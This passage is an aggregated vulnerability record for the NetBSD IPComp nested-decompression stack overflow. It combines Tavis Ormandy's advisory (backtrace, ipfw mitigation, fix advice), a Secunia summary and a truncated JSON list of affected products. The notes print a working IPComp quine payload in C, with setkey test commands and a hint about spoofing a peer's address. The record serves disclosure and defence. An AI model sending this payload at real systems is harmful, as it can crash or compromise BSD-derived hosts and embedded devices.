1 0xc06f0919 in trap (frame=0xcac49f84) at ../../../../arch/i386/i386/trap.c:368
2 0xc06f0566 in trap_tss (tss=0xc0cfe5ec, trapno=13, code=0) at ../../../../arch/i386/i386/trap.c:197
3 0xc010cb1b in ?? ()
(gdb) frame 1 (gdb) info symbol frame->tf_eip
etc.
Mitigation
- Please note, this document is intended for security professionals, network *
- or systems administrators, and vendors of network equipment and software. *
- End users need not be concerned. *
For numerous reasons, it is a good idea to filter IPComp at the perimeter if it is not expected. Even when implemented correctly, IPComp completely defeats the purpose of Delayed Compression in OpenSSH (see CAN-2005-2096 for an example of why you always want delayed compression). Additionally, the encapsulation means any attacks that require link-local access can simply be wrapped in ipcomp and are then routable (that is not good).
Affected servers and devices can use packet filtering to prevent the vulnerable code from being exercised. On systems with ipfw, a rule based on the following ipfw/ipfw6 template can be used, adjust to whitelist expected peers as appropriate.
ipfw add deny proto ipcomp
On other BSD systems, pfctl rules can be substituted. See vendor documentation for how to configure network appliances to deny IPComp at network boundaries.
Solution
I would recommend vendors disallow nested encapulation of ipcomp payloads. The implementation of this fix will of course vary by product.
By the time you read this advisory, a fix should have been committed to the NetBSD repository, downstream consumers of NetBSD code are advised to import the changes urgently.
A draft patch from S.P.Zeidler of the NetBSD project is attached for reference.
Credit
This bug was discovered by Tavis Ormandy.
Greetz
Greetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, Asirap, Meder, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., djm, Brian C., djrbliss, jono, and all my other elite friends and colleagues.
And of course, $1$kk1q85Xp$Id.gAcJOg7uelf36VQwJQ/.
Additional thanks to Jan, Felix and Meder for their mad xnu skillz.
Jan helps organize a security conference called #days held in Lucerne, Switzerland (a very picturesque Swiss city). The CFP is currently open, you should check it out at https://www.hashdays.ch/.
Notes
An elegant method of reproducing this flaw would be using self-reproducing Lempel-Ziv programs, rsc describes the technique here:
http://research.swtch.com/2010/03/zip-files-all-way-down.html
This method would also be able to disrupt non-recursive implementations that do not prevent nested encapulation, such as modern FreeBSD and OpenBSD. An ipcomp quine is defined below in GNU C syntax below, and a testcase for Linux is attached to this mail.
struct {
uint8_t comp_nxt; // Next Header
uint8_t comp_flags; // Reserved, must be zero
uint16_t comp_cpi; // Compression parameter index
uint8_t comp_data[180]; // Payload
} ipcomp = {
.comp_nxt = IPPROTO_COMP,
.comp_flags = 0,
.comp_cpi = htons(IPCOMP_DEFLATE),
.comp_data = {
0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff,
0xca, 0x61, 0x60, 0x60, 0x02, 0x00, 0x0a, 0x00, 0xf5, 0xff,
0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,
0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,
0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,
0x02, 0xb3, 0xc0, 0x2c, 0x00, 0x00, 0x05, 0x00, 0xfa, 0xff,
0x00, 0x05, 0x00, 0xfa, 0xff, 0x00, 0x14, 0x00, 0xeb, 0xff,
0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x14, 0x00, 0xeb, 0xff,
0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff,
0x42, 0x88, 0x21, 0xc4, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
0x00, 0x00, 0x00, 0xff, 0xff, 0x00, 0x0f, 0x00, 0xf0, 0xff,
0x82, 0x72, 0x61, 0x5c, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff,
0x01, 0x00, 0x00, 0xff, 0xff, 0x82, 0x72, 0x61, 0x5c, 0x00,
0x00, 0x00, 0x00, 0xff, 0xff, 0x01, 0x00, 0x00, 0xff, 0xff
}
};
Note that modern FreeBSD and OpenBSD appear to drop incoming ipcomp packets if no TBD entries are known (see netstat -s -p ipcomp statistics, and the setkey documentation). You will have to allow for this while testing. Depending on implementation, You may also need to spoof the source address of a peer, see man 7 raw.
Special thanks to rsc and Matthew Dempsky for hints and assistance.
Something like this may be useful for testing:
setkey -c
add 192.168.0.1 192.168.0.2 ipcomp 0002 -C deflate ^D
-
I would advise caution when sending malformed or pathological packets across critical infrastructure or the public internet, many embedded devices are based on BSD-derived code and may not handle the error gracefully.
-
Julien will be angry I didn't use scapy, sorry! I am a fan :-)
-
A bug in Xnu's custom allocator for zlib (deflate_alloc) causes zlib initialisation to fail if ~1k bytes is not available to MALLOC() with M_NOWAIT, even though M_WAITOK was intended, as described in the comments:
/*
* Avert your gaze, ugly hack follows!
* We init here so our malloc can allocate using M_WAIT.
* We don't want to allocate if ipcomp isn't used, and we
* don't want to allocate on the input or output path.
* Allocation fails if we use M_NOWAIT because init allocates
* something like 256k (ouch).
*/
However with some creativity it is possible to make the allocation succeed. You
can observe this bug by sending an ipcomp packet and looking for the memory
allocation failure in the network statistics (try something like netstat -s |
grep -A16 ipsec:). You can also set sysctl -w net.inet.ipsec.debug=1.
References
- http://research.swtch.com/2010/03/zip-files-all-way-down.html research!rsc: Zip Files All The Way Down
- http://tools.ietf.org/html/rfc3173 RFC3173: IP Payload Compression Protocol (IPComp)
- http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netinet6/ipcomp_input.c?rev=1.36&content-type=text/x-cvsweb-markup&only_with_tag=MAIN NetBSD: ipcomp_input.c, v1.36
- http://www.opensource.apple.com/source/xnu/xnu-1456.1.26/bsd/netinet6/ipcomp_input.c Xnu: ipcomp_input.c
- http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man8/ipfw.8.html ipfw -- IP firewall and traffic shaper control program
- http://www.netbsd.org/docs/network/pf.html The NetBSD Packet Filter (generally applies to other popular BSDs).
- http://fxr.watson.org/fxr/source/netinet6/ipcomp_input.c?v=FREEBSD64#L222 Earlier versions of FreeBSD were implemented recursively, the code was since refactored.
- http://fxr.watson.org/fxr/source/netipsec/xform_ipcomp.c?v=FREEBSD81#L299 The current version is implemented iteratively (see NOTES section on Quine DoS).
- http://www.force10networks.com/products/ftos.asp FTOS - Force10 Operating System
- http://www.qnx.com/developers/docs/6.4.1/io-pkt_en/user_guide/drivers.html QNX Network Drivers Documentation
Support high-quality journalism in information security by subscribing to LWN http://lwn.net/ (i have no connection to lwn other than appreciating their work).
I have a twitter account where I occasionally comment on security topics.
http://twitter.com/taviso
ex$$
--
taviso@cmpxchg8b.com | pgp encrypted mail preferred
. ----------------------------------------------------------------------
Secunia Research and vulnerability disclosures coordinated by Secunia:
http://secunia.com/research/
TITLE: NetBSD IPComp Payload Decompression Stack Overflow Vulnerability
SECUNIA ADVISORY ID: SA43969
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/43969/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=43969
RELEASE DATE: 2011-04-01
DISCUSS ADVISORY: http://secunia.com/advisories/43969/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/43969/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43969
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Tavis Ormandy has reported a vulnerability in NetBSD, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.
SOLUTION: Fixed in the CVS repository.
Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY: Tavis Ormandy
ORIGINAL ADVISORY: http://www.openwall.com/lists/oss-security/2011/04/01/1
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201105-0256",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netbsd",
"scope": "eq",
"trust": 1.9,
"vendor": "netbsd",
"version": "5.0.2"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 1.9,
"vendor": "netbsd",
"version": "5.0.1"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 1.9,
"vendor": "netbsd",
"version": "5.0"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 1.9,
"vendor": "netbsd",
"version": "5.1"
},
{
"model": "netbsd",
"scope": "eq",
"trust": 1.6,
"vendor": "netbsd",
"version": "4.0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "force10",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "freebsd",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "netbsd",
"version": null
},
{
"model": "seil/b1",
"scope": "eq",
"trust": 0.8,
"vendor": "internet initiative",
"version": "1.00 to 3.20"
},
{
"model": "seil/neu 2fe plus",
"scope": "eq",
"trust": 0.8,
"vendor": "internet initiative",
"version": "1.00 to 2.11"
},
{
"model": "seil/turbo",
"scope": "eq",
"trust": 0.8,
"vendor": "internet initiative",
"version": "1.00 to 2.11"
},
{
"model": "seil/x1",
"scope": "eq",
"trust": 0.8,
"vendor": "internet initiative",
"version": "1.00 to 3.20"
},
{
"model": "seil/x2",
"scope": "eq",
"trust": 0.8,
"vendor": "internet initiative",
"version": "1.00 to 3.20"
},
{
"model": "seil/x86",
"scope": "eq",
"trust": 0.8,
"vendor": "internet initiative",
"version": "1.70"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.1.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.8"
},
{
"model": "project",
"scope": "eq",
"trust": 0.3,
"vendor": "kame",
"version": "0"
},
{
"model": "-release-p2",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"model": "alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.0"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.11"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.8"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.6"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.1"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5.1"
},
{
"model": "4.10-prerelease",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "7.3-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.4"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.6.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.8"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"model": "-release-p5",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.0"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.8"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.1"
},
{
"model": "-prerelease",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.9"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.7"
},
{
"model": "-release/alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.6"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.2"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"model": "6.3-release-p10",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.0.2"
},
{
"model": "-release-p20",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.6"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.1"
},
{
"model": "-release-p8",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"model": "-release-p14",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.0"
},
{
"model": "-stablepre2001-07-20",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.5.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.5"
},
{
"model": "6.3-release-p11",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.0.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.2"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.0"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.6"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.3"
},
{
"model": "7.2-rc2",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"model": "7.0-release-p12",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.0"
},
{
"model": "-release-p3",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.11"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.5"
},
{
"model": "7.1-release-p4",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.0"
},
{
"model": "7.0-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.1"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.5"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.3"
},
{
"model": "7.2-release-p4",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "-stablepre122300",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.2x"
},
{
"model": "7.1-release-p5",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "7.0-release-p8",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.1"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.2.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.2"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.0.x"
},
{
"model": "directory pro",
"scope": "eq",
"trust": 0.3,
"vendor": "cosmicperl",
"version": "10.0.3"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.11"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.6"
},
{
"model": "7.1-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.03"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.11"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.8"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.1.7"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "-pre-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"model": "8.0-release",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
},
{
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.11"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"model": "7.3-release-p1",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "7.2-prerelease",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.1.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.3x"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.3"
},
{
"model": "-stablepre2002-03-07",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "1.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.5"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.1.6.1"
},
{
"model": "7.2-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.0.1"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.3"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.x"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "3.x"
},
{
"model": "-release-p9",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"model": "alpha",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.3.9"
},
{
"model": "-release-p3",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.4"
},
{
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.7"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.1.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.6"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "2.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.8"
},
{
"model": "-release-p1",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.2.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.1.4"
},
{
"model": "-release-p6",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"model": "-release-p5",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.1"
},
{
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.5"
},
{
"model": "8.0-stable",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "7.1-release-p6",
"scope": null,
"trust": 0.3,
"vendor": "freebsd",
"version": null
},
{
"model": "-stablepre050201",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "4.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "5.0"
},
{
"model": "-release-p9",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
